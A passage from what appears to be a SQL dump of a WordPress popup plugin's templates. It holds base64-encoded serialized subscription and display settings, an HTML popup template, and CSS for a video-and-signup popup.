7czowOiIiO3M6MjE6InN1Yl9hd2ViZXJfYWR0cmFja2luZyI7czowOiIiO3M6MjE6InN1Yl9tYWlsY2hpbXBfYXBpX2tleSI7czowOiIiO3M6MjU6InN1Yl9tYWlsY2hpbXBfZ3JvdXBzX2Z1bGwiO3M6MDoiIjtzOjEwOiJzdWJfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo4OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO3M6MTA6InNldF9wcmVzZXQiO3M6MDoiIjt9czo1OiJlbWFpbCI7YTo4OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MTA6InNldF9wcmVzZXQiO3M6MDoiIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6OToiYmxhY2tsaXN0IjtzOjA6IiI7czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo3OiJTSUdOLVVQIjtzOjEzOiJzdWJfbmV3X2VtYWlsIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoxNToic3ViX25ld19zdWJqZWN0IjtzOjI4OiJOZXcgc3Vic2NyaWJlciBvbiBbc2l0ZW5hbWVdIjtzOjE1OiJzdWJfbmV3X21lc3NhZ2UiO3M6MTI5OiJZb3UgaGF2ZSBuZXcgc3Vic2NyaWJlciBvbiB5b3VyIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LCBoZXJlIGlzIHN1YnNjcmliZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6MTI6ImNvbnRhY3RfZm9ybSI7czoyOiIxOSI7czoxMjoic3RhdF9nYV9jb2RlIjtzOjA6IiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mzp7czo5OiJiZ19udW1iZXIiO3M6MToiMyI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIwIjtzOjIxOiJ2aWRlb19oZWlnaHRfYXNfcG9wdXAiO3M6MToiMSI7fX0=','<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			<div class=\"ppsPopupVideo \">\r\n				[video_html]\r\n			</div>\r\n			<div style=\"clear: both;\"></div>\r\n		</div>\r\n		<div class=\"ppsRightCol\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				<div style=\"clear: both;\"></div>\r\n			[endif]\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 0;\r\n  	font-family: arial;\r\n	font-size: 13px;\r\n	line-height: normal;\r\n	font-weight: normal;\r\n	color: #015050;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: border-box;\r\n	-moz-box-sizing:    border-box;\r\n	box-sizing:         border-box;\r\n}\r\n#ppsPopupShell_[ID] iframe {\r\n	width: 100% !important;\r\n	margin: 0;\r\n    padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n	display: table-cell;\r\n	vertical-align: middle;\r\n	\r\n	{% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 66%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n\r\n	[if bg_type_0 == \"color\"]\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\", endColorstr=\"[bg_color_0]\",GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \"img\"]\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n	background-position: center top;\r\n	[else]\r\n	background: none;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	display: table-cell;\r\n  	width: 34%;\r\n  	height: 100%;\r\n  	vertical-align: middle;\r\n	padding: 15px 0;\r\n	margin: 0;\r\n	\r\n  	[if bg_type_1 == \"color\"]\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\"{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\", endColorstr=\"[bg_color_1]\",GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \"img\"]\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n	background-position: center top;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 15px 30px 0;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input::-moz-placeholder { /* Firefox 19+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input:-ms-input-placeholder { /* IE 10+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input:-moz-placeholder { /* Firefox 18- */\r\n    color: #ccc;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea::-webkit-input-placeholder { /* Chrome/Opera/Safari */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea::-moz-placeholder { /* Firefox 19+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea:-ms-input-placeholder { /* IE 10+ */\r\n    color: #ccc;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea:-moz-placeholder { /* Firefox 18- */\r\n    color: #ccc;\r\n}\r\n/*For all Elements*/\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"password\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: arial;\r\n	font-size: 16px;\r\n	font-weight: normal;\r\n	line-height: normal;\r\n	color: #aaa;\r\n	text-align:center;\r\n	width: 100%;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	border: 0px solid transparent;\r\n	display:block;\r\n    \r\n    margin: 10px 0 0;\r\n	padding: 0 10px 0 10px;\r\n	height: 40px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	height: auto;\r\n	padding-top: 9px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeForm input:first-child {\r\n	margin-top: 0px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select  {\r\n	margin: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  {\r\n	display: block;\r\n	font-family: arial;\r\n	font-size: 16px;\r\n	font-weight: normal;\r\n	line-height: normal;\r\n	color: #015050;\r\n	\r\n	margin: 10px 0 0;\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell label  span {\r\n	display: block;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"text\"][name=\"name\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/user-black-icon.png\");\r\n	background-position: 12px center;\r\n	background-repeat: no-repeat;\r\n	background-size: 16px auto;\r\n	padding: 0 25px 0 35px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"email\"] {\r\n	background-image: url(\"[PPS_ASSETS_URL]img/assets/email-black-icon.png\");\r\n	background-position: 11px center;\r\n	background-repeat: no-repeat;\r\n	background-size: 18px auto;\r\n	padding: 0 25px 0 35px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=\"submit\"] {\r\n	display: block;\r\n	font-family: arial;\r\n	font-size: 17px;\r\n	font-weight: bold;\r\n	line-height: normal;\r\n	color: #fff;\r\n  	cursor: pointer;\r\n	margin: 10px 0 0;\r\n	-webkit-border-radius: 5px;\r\n	-moz-border-radius: 5px;\r\n	border-radius: 5px;\r\n	border: 0px solid transparent;\r\n	width: 100%;\r\n	height: 50px;\r\n	\r\n  	[if bg_type_2 == \"color\"]\r\n  	background: [bg_color_2] 100%;\r\n  	[elseif bg_type_2 == \"img\"]\r\n  	background: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #015050;\r\n	font-family: arial;\r\n	font-size: 30px;\r\n	line-height: 40px;\r\n	font-weight: bold;\r\n	margin: 0 15px 15px;\r\n	padding: 0;\r\n	text-align: center;\r\n\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupVideo {\r\n  	width: 100%;\r\n  	line-height: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSuccessMsg {\r\n	color: #015050 !important;\r\n	font-weight: bold;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubMsg {\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote {\r\n	color: #015050;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: normal;\r\n	font-weight: bold;\r\n    line-height: 14px;\r\n  	margin: 15px 30px 5px;\r\n	padding: 0;\r\n	text-align: center;\r\n}','2016-230-5-video-list-prev.png',1,1,1,3,0,0,0,'2015-01-10 17:59:43',1,0),(6,'Video Classy',1,0,'YTozOntzOjQ6Im1haW4iO2E6MjQ6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6Nzoic2hvd190byI7czo4OiJldmVyeW9uZSI7czoyOToic2hvd190b19maXJzdF90aW1lX3Zpc2l0X2RheXMiO3M6MjoiMzAiO3M6MzA6InNob3dfdG9fdW50aWxfbWFrZV9hY3Rpb25fZGF5cyI7czoyOiIzMCI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6NzE6e3M6OToidmlkZW9fdXJsIjtzOjQzOiJodHRwczovL3d3dy55b3V0dWJlLmNvbS93YXRjaD92PW5LSXU5eWVuNW5jIjtzOjU6IndpZHRoIjtzOjM6IjYzMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czo2OiJoZWlnaHQiO3M6MzoiNDgwIjtzOjE0OiJoZWlnaHRfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNlY2UwZDEiO3M6OToiYmdfdHlwZV8xIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18xIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjN2ZiNmNiIjtzOjEwOiJmb250X2xhYmVsIjtzOjc6ImRlZmF1bHQiO3M6MTY6ImxhYmVsX2ZvbnRfY29sb3IiO3M6NzoiIzU1NTU1NSI7czoxMToiZm9udF9mb290ZXIiO3M6NzoiZGVmYXVsdCI7czoxNzoiZm9vdGVyX2ZvbnRfY29sb3IiO3M6NzoiIzk5OTk5OSI7czo5OiJjbG9zZV9idG4iO3M6MTE6ImNsYXNzeV9ncmV5IjtzOjExOiJsYXllcmVkX3BvcyI7czozOiJ0b3AiO3M6NToibGFiZWwiO3M6MTg6Ikxvb2sgb3VyIG5ldyB2aWRlbyI7czo5OiJmb290X25vdGUiO3M6MDoiIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6Njoic2ltcGxlIjtzOjg6ImFuaW1fa2V5IjtzOjQ6Im5vbmUiO3M6MTM6ImFuaW1fZHVyYXRpb24iO3M6MDoiIjtzOjg6InN1Yl9kZXN0IjtzOjk6IndvcmRwcmVzcyI7czoyMzoic3ViX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTk6InN1Yl9hd2ViZXJfbGlzdG5hbWUiO3M6MDoiIjtzOjIxOiJzdWJfYXdlYmVyX2FkdHJhY2tpbmciO3M6MDoiIjtzOjIxOiJzdWJfbWFpbGNoaW1wX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfZ3JfYXBpX2tleSI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfdXJsIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV9rZXkiO3M6MDoiIjtzOjE4OiJzdWJfYXJfZm9ybV9hY3Rpb24iO3M6MDoiIjtzOjEwOiJzdWJfc2dhX2lkIjtzOjA6IiI7czoxNToic3ViX3NnYV9saXN0X2lkIjtzOjA6IiI7czoyMToic3ViX3NnYV9hY3RpdmF0ZV9jb2RlIjtzOjA6IiI7czoxMDoic3ViX2ZpZWxkcyI7YToyOntzOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fXM6NDoibmFtZSI7YTo3OntzOjM6ImVuYiI7czoxOiIxIjtzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO319czoyMDoic3ViX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InN1Yl90eHRfc3VjY2VzcyI7czoyNDoiVGhhbmsgeW91IGZvciBzdWJzY3JpYmUhIjtzOjIxOiJzdWJfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MjA6InN1Yl90eHRfZXhpc3RzX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLVVwISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgdXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjU6IkxvZ2luIjtzOjE2OiJyZWdfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyMzoicmVnX3dwX2NyZWF0ZV91c2VyX3JvbGUiO3M6MTA6InN1YnNjcmliZXIiO3M6MTM6InJlZ19idG5fbGFiZWwiO3M6ODoiUmVnaXN0ZXIiO3M6MTA6InJlZ19maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InJlZ190eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJyZWdfdHh0X3N1Y2Nlc3MiO3M6Mjc6IlRoYW5rIHlvdSBmb3IgcmVnaXN0cmF0aW9uISI7czoyMToicmVnX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO31zOjEwOiJvcHRzX2F0dHJzIjthOjQ6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjIiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMCI7czoyMDoidmlkZW9fd2lkdGhfYXNfcG9wdXAiO3M6MToiMSI7czoyMToidmlkZW9faGVpZ2h0X2FzX3BvcHVwIjtzOjE6IjEiO319','<div 